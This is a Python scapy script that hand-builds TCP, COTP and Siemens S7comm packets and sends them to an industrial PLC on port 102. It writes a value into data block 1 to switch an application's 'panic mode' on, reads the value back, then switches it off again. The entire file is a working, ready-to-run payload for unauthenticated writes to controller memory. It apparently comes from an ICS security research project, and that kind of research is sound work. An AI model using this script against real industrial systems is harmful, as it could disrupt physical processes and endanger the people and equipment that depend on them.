#! /usr/bin/env python3 ######## COPYRIGHT ######## # Copyright 2023 Jarno Baselier. All rights reserved. # This software may be modified and distributed under the terms # of the "Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) license. https://creativecommons.org/licenses/by-nc-sa/4.0/. #Based on master-file for Step7 purposes (and configured for a Siemens Logo PLC) called "ics-payload.py": #https://github.com/mrbaselier/ICS-Payload #Yes, in this example file I define full packets while I could consolidate the information to make the payload more compact. I have chosen readability and customization over filesize. # WHAT DOES THIS SCRIPT DO? # 1. Setup 3-way handshake # 2. Setup COTP communication # 3. Setup Step7 communication # 4. Write the value of 1 in database 1 at offset 0 - This turns on the panic mode (of the specific application I use in this example, this may depend) # 5. Read the database values # 6. Pause for 2 seconds # 7. Write the value of 0 in database 1 at offset 0 - This turns off the panic mode (of the specific application I use in this example, this may depend # 8. Read the database values ######## IMPORTS ######## from scapy.all import * import struct import binascii import threading import time import codecs ######## SETTINGS / VARIABLES ######## #randomize ports: random.randint(20000,50000) source_ip = '' destination_ip = '' source_port = random.randint(20000,50000) destination_port = 102 tcp_start_seq_nr = random.randint(20000,50000) send_interface = "Ethernet 2" ######## FUNCTIONS ######## def string_to_bytes(value): value = str.encode(value) #print(value) return value def int_to_bytes_1(value): value = value.to_bytes(1, byteorder='big') #print(value) return value def int_to_bytes_2(value): value = value.to_bytes(2, byteorder='big') #print(value) return value def int_to_bytes_4(value): value = value.to_bytes(4, byteorder='big') #print(value) return value ######## PART1 - Start with 3-way handshake - Send SYN and await response ######## l3 = IP(#version=4, flags=2, proto=6, src=source_ip, dst=destination_ip ) #TCP #tcp_options = [("MSS" , 1460),('Timestamp', (1098453, 0)),("NOP",None),("WScale",2),("NOP",None),("NOP",None),("SAckOK","")] tcp_options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (3840354, 0)), ('NOP', None), ('WScale', 0)] l4 = TCP(sport=source_port, dport=destination_port, flags='S', options=tcp_options, seq=tcp_start_seq_nr ) SYNpacket = l3 / l4 #Show packet #SYNpacket.show2() #Send packet and await response RETURNPACKET = sr1(SYNpacket) ######## PART2 - After receiving SYN/ACK, send an ACK ######## l4 = TCP(sport=source_port, dport=destination_port, flags='A', seq=RETURNPACKET.ack, ack=RETURNPACKET.seq + 1 ) ACKpacket = l3 / l4 #Show packet #ACKpacket.show2() #Send packet send(ACKpacket) ######## PART3 - INITIATE ISO CONNECTION / ISO TRANSFER ######## #TPKT tpkt_version = int_to_bytes_1(3) tpkt_reserved = int_to_bytes_1(0) tpkt_length = int_to_bytes_2(22) #Compile Raw part of the TPKT package TPKT = tpkt_version + tpkt_reserved + tpkt_length #=================================== #ISO_8073 iso_length = int_to_bytes_1(17) iso_pdu_type = int_to_bytes_1(224) iso_dest_ref = int_to_bytes_2(0) iso_src_ref = int_to_bytes_2(10) iso_class = int_to_bytes_1(0) iso_parameter_code = int_to_bytes_1(193) iso_parameter_length = int_to_bytes_1(2) iso_source_tsap1 = int_to_bytes_1(2) iso_source_tsap2 = int_to_bytes_1(0) iso_parameter_code2 = int_to_bytes_1(194) iso_parameter_length2 = int_to_bytes_1(2) iso_dest_tsap1 = int_to_bytes_1(2) iso_dest_tsap2 = int_to_bytes_1(0) iso_parameter_code3 = int_to_bytes_1(192) iso_parameter_length3 = int_to_bytes_1(1) iso_tpdu_size = int_to_bytes_1(10) #Compile Raw part of ISO_8073 package ISO_8073 = iso_length + iso_pdu_type + iso_dest_ref + iso_src_ref + iso_class + iso_parameter_code + iso_parameter_length + iso_source_tsap1 + iso_source_tsap2 + iso_parameter_code2 + iso_parameter_length2 + iso_dest_tsap1 + iso_dest_tsap2 + iso_parameter_code3 + iso_parameter_length3 + iso_tpdu_size #=================================== payload = TPKT + ISO_8073 l4 = TCP(sport=source_port, dport=destination_port, flags='PA', seq=ACKpacket.seq, ack=ACKpacket.ack ) CONNpacket = l3 / l4 / payload #Show packet #CONNpacket.show2() #Send packet and await response RETURNPACKET = sr1(CONNpacket) RETURNPACKET.show2() ######## PART4 - After receiving COTP return packet, send an ACK ######## l4 = TCP(sport=source_port, dport=destination_port, flags='A', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) ACKpacket = l3 / l4 #Show packet #ACKpacket.show2() #Send packet send(ACKpacket) ######## PART5 - SETUP COMMUNICATION ######## #TPKT tpkt_version = int_to_bytes_1(3) tpkt_reserved = int_to_bytes_1(0) tpkt_spacer = int_to_bytes_1(0) tpkt_length = int_to_bytes_1(25) #Compile Raw part of the TPKT package TPKT = tpkt_version + tpkt_reserved + tpkt_spacer + tpkt_length #=================================== #ISO_8073 iso_length = int_to_bytes_1(2) iso_pdu_type = int_to_bytes_1(240) iso_tpdu_number = int_to_bytes_1(128) #Compile Raw part of ISO_8073 package ISO_8073 = iso_length + iso_pdu_type + iso_tpdu_number #=================================== #STEP7 s7_protocol_id = int_to_bytes_1(50) s7_rosctr = int_to_bytes_1(1) s7_red_id = int_to_bytes_2(0) s7_protocol_dataunit_ref = int_to_bytes_2(8449) s7_param_length_pt1 = int_to_bytes_1(0) s7_param_length_pt2 = int_to_bytes_1(8) s7_data_length_pt1 = int_to_bytes_1(0) s7_data_length_pt2 = int_to_bytes_1(0) s7_function = int_to_bytes_1(240) s7_reserved = int_to_bytes_1(0) s7_max_amq_calling = int_to_bytes_2(1) s7_max_amq_called = int_to_bytes_2(2) s7_pdu_length = int_to_bytes_2(240) #Compile Raw part of the Siemens S7 package SiemensS7 = s7_protocol_id + s7_rosctr + s7_red_id + s7_protocol_dataunit_ref + s7_param_length_pt1 + s7_param_length_pt2 + s7_data_length_pt1 + s7_data_length_pt2 + s7_function + s7_reserved + s7_max_amq_calling + s7_max_amq_called + s7_pdu_length#+ s7_item_count + s7_variable_specification + s7_length_next + s7_syntaxid + s7_transportsize + s7_length_next_address_spec + s7_db_nr + s7_area_data_blocks + s7_address_pt1 + s7_address_pt2 + s7_address_pt3 + s7_return_code + s7_transport_size + s7_item_length + s7_item_data #=================================== payload = TPKT + ISO_8073 + SiemensS7 l4 = TCP(sport=source_port, dport=destination_port, flags='PA', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) COMMpacket = l3 / l4 / payload #Send packet and await response RETURNPACKET = sr1(COMMpacket) ######## PART6 - After receiving S7COMM return packet, send an ACK ######## l4 = TCP(sport=source_port, dport=destination_port, flags='A', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) ACKpacket = l3 / l4 #Show packet #ACKpacket.show2() #Send packet send(ACKpacket) ######## PART7 - Write Variables - Turn On - Set item data to 1 in database 1 at offset 0 ######## #TPKT tpkt_version = int_to_bytes_1(3) tpkt_reserved = int_to_bytes_1(0) tpkt_spacer = int_to_bytes_1(0) tpkt_length = int_to_bytes_1(36) #Compile Raw part of the TPKT package TPKT = tpkt_version + tpkt_reserved + tpkt_spacer + tpkt_length #=================================== #ISO_8073 iso_length = int_to_bytes_1(2) iso_pdu_type = int_to_bytes_1(240) iso_tpdu_number = int_to_bytes_1(128) #Compile Raw part of ISO_8073 package ISO_8073 = iso_length + iso_pdu_type + iso_tpdu_number #=================================== #STEP7 s7_protocol_id = int_to_bytes_1(50) s7_rosctr = int_to_bytes_1(1) s7_red_id = int_to_bytes_2(0) s7_protocol_dataunit_ref1 = int_to_bytes_1(1) s7_protocol_dataunit_ref2 = int_to_bytes_1(2) s7_param_length_pt1 = int_to_bytes_1(0) s7_param_length_pt2 = int_to_bytes_1(14) s7_data_length_pt1 = int_to_bytes_1(0) s7_data_length_pt2 = int_to_bytes_1(5) s7_function = int_to_bytes_1(5) s7_item_count = int_to_bytes_1(1) #Item s7_variable_specification = int_to_bytes_1(18) s7_length_next = int_to_bytes_1(10) s7_syntaxid = int_to_bytes_1(16) s7_transportsize = int_to_bytes_1(1) s7_length_next_address_spec = int_to_bytes_2(1) s7_db_nr = int_to_bytes_2(1) s7_area_data_blocks = int_to_bytes_1(132) s7_address_pt1 = int_to_bytes_1(0) s7_address_pt2 = int_to_bytes_1(0) s7_address_pt3 = int_to_bytes_1(0) #Data s7_return_code = int_to_bytes_1(255) s7_transport_size = int_to_bytes_1(3) s7_item_length = int_to_bytes_2(1) s7_item_data = int_to_bytes_1(1) #Compile Raw part of the Siemens S7 package SiemensS7 = s7_protocol_id + s7_rosctr + s7_red_id + s7_protocol_dataunit_ref1 + s7_protocol_dataunit_ref2 + s7_param_length_pt1 + s7_param_length_pt2 + s7_data_length_pt1 + s7_data_length_pt2 + s7_function + s7_item_count + s7_variable_specification + s7_length_next + s7_syntaxid + s7_transportsize + s7_length_next_address_spec + s7_db_nr + s7_area_data_blocks + s7_address_pt1 + s7_address_pt2 + s7_address_pt3 + s7_return_code + s7_transport_size + s7_item_length + s7_item_data #=================================== payload = TPKT + ISO_8073 + SiemensS7 l4 = TCP(sport=source_port, dport=destination_port, flags='PA', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) COMMpacket = l3 / l4 / payload #Show packet #COMMpacket.show2() #Send packet and await response RETURNPACKET = sr1(COMMpacket) print("RETURNPACKET") ######## PART8 - After receiving return information, send an ACK ######## l4 = TCP(sport=source_port, dport=destination_port, flags='A', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) ACKpacket = l3 / l4 #Show packet #ACKpacket.show2() #Send packet send(ACKpacket) ######## PART9 - Read Variables ######## #TPKT tpkt_version = int_to_bytes_1(3) tpkt_reserved = int_to_bytes_1(0) tpkt_spacer = int_to_bytes_1(0) tpkt_length = int_to_bytes_1(31) #Compile Raw part of the TPKT package TPKT = tpkt_version + tpkt_reserved + tpkt_spacer + tpkt_length #=================================== #ISO_8073 iso_length = int_to_bytes_1(2) iso_pdu_type = int_to_bytes_1(240) iso_tpdu_number = int_to_bytes_1(128) #Compile Raw part of ISO_8073 package ISO_8073 = iso_length + iso_pdu_type + iso_tpdu_number #=================================== #STEP7 s7_protocol_id = int_to_bytes_1(50) s7_rosctr = int_to_bytes_1(1) s7_red_id = int_to_bytes_2(0) s7_protocol_dataunit_ref = int_to_bytes_2(258) s7_param_length_pt1 = int_to_bytes_1(0) s7_param_length_pt2 = int_to_bytes_1(14) s7_data_length_pt1 = int_to_bytes_1(0) s7_data_length_pt2 = int_to_bytes_1(0) s7_function = int_to_bytes_1(4) s7_item_count = int_to_bytes_1(1) #Item s7_variable_specification = int_to_bytes_1(18) s7_length_next = int_to_bytes_1(10) s7_syntaxid = int_to_bytes_1(16) s7_transportsize = int_to_bytes_1(1) s7_length_next_address_spec = int_to_bytes_2(1) s7_db_nr = int_to_bytes_2(1) s7_area_data_blocks = int_to_bytes_1(132) s7_address_pt1 = int_to_bytes_1(0) s7_address_pt2 = int_to_bytes_1(0) s7_address_pt3 = int_to_bytes_1(0) #Compile Raw part of the Siemens S7 package SiemensS7 = s7_protocol_id + s7_rosctr + s7_red_id + s7_protocol_dataunit_ref + s7_param_length_pt1 + s7_param_length_pt2 + s7_data_length_pt1 + s7_data_length_pt2 + s7_function + s7_item_count + s7_variable_specification + s7_length_next + s7_syntaxid + s7_transportsize + s7_length_next_address_spec + s7_db_nr + s7_area_data_blocks + s7_address_pt1 + s7_address_pt2 + s7_address_pt3 #=================================== payload = TPKT + ISO_8073 + SiemensS7 l4 = TCP(sport=source_port, dport=destination_port, flags='PA', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) COMMpacket = l3 / l4 / payload #Show packet #COMMpacket.show2() #Send packet and await response RETURNPACKET = sr1(COMMpacket) ######## PART10 - After receiving return information, send an ACK ######## l4 = TCP(sport=source_port, dport=destination_port, flags='A', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) ACKpacket = l3 / l4 #Show packet #ACKpacket.show2() #Send packet send(ACKpacket) ######## PART11 - Pause for 2 seconds ######## time.sleep(2) ######## PART12 - Write Variables - Turn Off - Set item data to 0 in database 1 at offset 0 ######## #TPKT tpkt_version = int_to_bytes_1(3) tpkt_reserved = int_to_bytes_1(0) tpkt_spacer = int_to_bytes_1(0) tpkt_length = int_to_bytes_1(36) #Compile Raw part of the TPKT package TPKT = tpkt_version + tpkt_reserved + tpkt_spacer + tpkt_length #=================================== #ISO_8073 iso_length = int_to_bytes_1(2) iso_pdu_type = int_to_bytes_1(240) iso_tpdu_number = int_to_bytes_1(128) #Compile Raw part of ISO_8073 package ISO_8073 = iso_length + iso_pdu_type + iso_tpdu_number #=================================== #STEP7 s7_protocol_id = int_to_bytes_1(50) s7_rosctr = int_to_bytes_1(1) s7_red_id = int_to_bytes_2(0) s7_protocol_dataunit_ref1 = int_to_bytes_1(1) s7_protocol_dataunit_ref2 = int_to_bytes_1(2) s7_param_length_pt1 = int_to_bytes_1(0) s7_param_length_pt2 = int_to_bytes_1(14) s7_data_length_pt1 = int_to_bytes_1(0) s7_data_length_pt2 = int_to_bytes_1(5) s7_function = int_to_bytes_1(5) s7_item_count = int_to_bytes_1(1) #Item s7_variable_specification = int_to_bytes_1(18) s7_length_next = int_to_bytes_1(10) s7_syntaxid = int_to_bytes_1(16) s7_transportsize = int_to_bytes_1(1) s7_length_next_address_spec = int_to_bytes_2(1) s7_db_nr = int_to_bytes_2(1) s7_area_data_blocks = int_to_bytes_1(132) s7_address_pt1 = int_to_bytes_1(0) s7_address_pt2 = int_to_bytes_1(0) s7_address_pt3 = int_to_bytes_1(0) #Data s7_return_code = int_to_bytes_1(255) s7_transport_size = int_to_bytes_1(3) s7_item_length = int_to_bytes_2(1) s7_item_data = int_to_bytes_1(0) #Compile Raw part of the Siemens S7 package SiemensS7 = s7_protocol_id + s7_rosctr + s7_red_id + s7_protocol_dataunit_ref1 + s7_protocol_dataunit_ref2 + s7_param_length_pt1 + s7_param_length_pt2 + s7_data_length_pt1 + s7_data_length_pt2 + s7_function + s7_item_count + s7_variable_specification + s7_length_next + s7_syntaxid + s7_transportsize + s7_length_next_address_spec + s7_db_nr + s7_area_data_blocks + s7_address_pt1 + s7_address_pt2 + s7_address_pt3 + s7_return_code + s7_transport_size + s7_item_length + s7_item_data #=================================== payload = TPKT + ISO_8073 + SiemensS7 l4 = TCP(sport=source_port, dport=destination_port, flags='PA', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) COMMpacket = l3 / l4 / payload #Show packet #COMMpacket.show2() #Send packet and await response RETURNPACKET = sr1(COMMpacket) print("RETURNPACKET") ######## PART13 - After receiving return information, send an ACK ######## l4 = TCP(sport=source_port, dport=destination_port, flags='A', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) ACKpacket = l3 / l4 #Show packet #ACKpacket.show2() #Send packet send(ACKpacket) ######## PART14 - Read Variables ######## #TPKT tpkt_version = int_to_bytes_1(3) tpkt_reserved = int_to_bytes_1(0) tpkt_spacer = int_to_bytes_1(0) tpkt_length = int_to_bytes_1(31) #Compile Raw part of the TPKT package TPKT = tpkt_version + tpkt_reserved + tpkt_spacer + tpkt_length #=================================== #ISO_8073 iso_length = int_to_bytes_1(2) iso_pdu_type = int_to_bytes_1(240) iso_tpdu_number = int_to_bytes_1(128) #Compile Raw part of ISO_8073 package ISO_8073 = iso_length + iso_pdu_type + iso_tpdu_number #=================================== #STEP7 s7_protocol_id = int_to_bytes_1(50) s7_rosctr = int_to_bytes_1(1) s7_red_id = int_to_bytes_2(0) s7_protocol_dataunit_ref = int_to_bytes_2(258) s7_param_length_pt1 = int_to_bytes_1(0) s7_param_length_pt2 = int_to_bytes_1(14) s7_data_length_pt1 = int_to_bytes_1(0) s7_data_length_pt2 = int_to_bytes_1(0) s7_function = int_to_bytes_1(4) s7_item_count = int_to_bytes_1(1) #Item s7_variable_specification = int_to_bytes_1(18) s7_length_next = int_to_bytes_1(10) s7_syntaxid = int_to_bytes_1(16) s7_transportsize = int_to_bytes_1(1) s7_length_next_address_spec = int_to_bytes_2(1) s7_db_nr = int_to_bytes_2(1) s7_area_data_blocks = int_to_bytes_1(132) s7_address_pt1 = int_to_bytes_1(0) s7_address_pt2 = int_to_bytes_1(0) s7_address_pt3 = int_to_bytes_1(0) #Compile Raw part of the Siemens S7 package SiemensS7 = s7_protocol_id + s7_rosctr + s7_red_id + s7_protocol_dataunit_ref + s7_param_length_pt1 + s7_param_length_pt2 + s7_data_length_pt1 + s7_data_length_pt2 + s7_function + s7_item_count + s7_variable_specification + s7_length_next + s7_syntaxid + s7_transportsize + s7_length_next_address_spec + s7_db_nr + s7_area_data_blocks + s7_address_pt1 + s7_address_pt2 + s7_address_pt3 #=================================== payload = TPKT + ISO_8073 + SiemensS7 l4 = TCP(sport=source_port, dport=destination_port, flags='PA', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) COMMpacket = l3 / l4 / payload #Show packet #COMMpacket.show2() #Send packet and await response RETURNPACKET = sr1(COMMpacket) ######## PART15 - After receiving return information, send an ACK ######## l4 = TCP(sport=source_port, dport=destination_port, flags='A', seq=RETURNPACKET.ack, ack=RETURNPACKET.len + RETURNPACKET.seq-40 ) ACKpacket = l3 / l4 #Show packet #ACKpacket.show2() #Send packet send(ACKpacket)